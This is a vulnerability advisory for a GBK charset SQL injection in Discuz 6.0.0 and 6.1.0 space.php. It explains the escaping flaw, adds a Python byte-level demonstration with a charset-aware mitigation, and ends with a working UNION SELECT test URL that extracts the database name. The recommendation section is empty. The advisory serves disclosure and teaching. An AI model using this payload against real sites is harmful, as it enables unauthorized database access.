Affected versions: Discuz 6.0.0, Discuz 6.1.0
Description:
In Discuz's user space feature, space.php runs the following query:
$member = $db->fetch_first("SELECT m.*, mf.*, u.grouptitle, u.type, u.creditshigher, u.creditslower, u.readaccess, u.color AS groupcolor, u.stars AS groupstars, u.allownickname, u.allowuseblog, r.ranktitle, r.color AS rankcolor, r.stars AS rankstars $oltimeadd1 FROM {$tablepre}members m LEFT JOIN {$tablepre}memberfields mf ON mf.uid=m.uid LEFT JOIN {$tablepre}usergroups u ON u.groupid=m.groupid LEFT JOIN {$tablepre}ranks r ON m.posts>=r.postshigher $oltimeadd2 WHERE ".($uid ? "m.uid='$uid'" : "m.username='$username'")."ORDER BY r.postshigher DESC LIMIT 1");
The query interpolates the username value, and a specially encoded username produces an SQL injection. Installations using UTF-8 are not affected.
Encoding-based injection vulnerabilities of this kind have been appearing frequently. Under an encoding such as GBK, the PHP side cannot properly escape the single quote, which is what makes the vulnerability possible. Programs using UTF-8 do not have this problem: no error arises during charset conversion, the quote is escaped intact, and encoding-based injection is ruled out.
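The following is an added example, not code from the advisory or from Discuz, showing at the byte level why a charset-unaware escape (addslashes() style) fails for the %cf' input under GBK but not under UTF-8, and how a charset-aware escape rejects the malformed sequence. It assumes Python's gbk codec approximates how a GBK-configured MySQL connection decodes the bytes; the payload and the sample username are constructed.

```python
from typing import Optional

def naive_escape(raw: bytes) -> bytes:
    """Escape like PHP's addslashes(): prefix ' " \\ and NUL with 0x5C,
    byte by byte, with no knowledge of the connection charset."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def has_unescaped_quote(text: str) -> bool:
    """Scan decoded text as an SQL lexer would: a backslash escapes the
    next character; any other single quote ends the string literal."""
    i = 0
    while i < len(text):
        if text[i] == "\\":
            i += 2
            continue
        if text[i] == "'":
            return True
        i += 1
    return False

def breaks_out(escaped: bytes, charset: str) -> bool:
    """True if the escaped bytes, decoded as the connection charset would
    decode them, still contain a quote that closes the literal."""
    return has_unescaped_quote(escaped.decode(charset, errors="replace"))

def charset_aware_escape(raw: bytes, charset: str) -> Optional[bytes]:
    """Mitigation: decode strictly first (a lone GBK lead byte followed by
    a quote is rejected), escape per character, then re-encode."""
    try:
        text = raw.decode(charset)
    except UnicodeDecodeError:
        return None  # invalid in this charset: reject rather than guess
    escaped = "".join("\\" + c if c in "'\"\\\x00" else c for c in text)
    return escaped.encode(charset)

# Constructed input: the advisory's %cf' prefix, URL-decoded.
PAYLOAD = b"\xcf'"

if __name__ == "__main__":
    for cs in ("gbk", "utf-8"):
        # Under GBK the bytes CF 5C form one character and the quote is bare.
        print(cs, "breaks out:", breaks_out(naive_escape(PAYLOAD), cs))
    print("strict GBK escape of payload:", charset_aware_escape(PAYLOAD, "gbk"))
```

Parameterised queries remain the preferred fix; the strict decode above only shows why escaping must be done in the connection's charset.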
Test method:
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!
http://<address>/space.php?username=%cf'%20UNION%20Select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,database(),83/*
Security recommendation: